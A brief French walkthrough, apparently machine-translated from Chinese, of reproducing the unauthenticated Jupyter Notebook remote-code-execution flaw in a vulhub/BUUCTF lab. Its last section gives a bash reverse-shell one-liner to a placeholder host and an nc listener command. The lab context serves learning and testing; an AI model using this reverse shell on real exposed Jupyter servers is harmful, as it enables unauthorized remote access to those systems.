1. Introduction
Jupyter Notebook (précédemment appelé IPython notebook) est un bloc-notes interactif qui prend en charge l'exécution de plus de 40 langages de programmation.
Si l'administrateur ne configure pas de mot de passe pour Jupyter Notebook, cela entraînera une vulnérabilité d'accès non autorisé, où les visiteurs peuvent créer une console et exécuter du code et des commandes Python arbitraires.
2. Reproduisez l'environnement
Provenant de https://github.com/vulhub/vulhub/blob/master/jupyter/notebook-rce/ map pour faciliter la reproduction directe avec l'environnement BUUCTF REAL
3. Utilisation
Créez une nouvelle fenêtre de terminal, hehe hey, directement RCE
comme indiqué ci-dessous
4. Je ne ressens rien à dire
À propos de la coque rebond
bash -i >& /dev/tcp/x.x.x.x/8080 0>&1
Alors écoute juste de l'autre côté
nc -lvp 8080(像这样)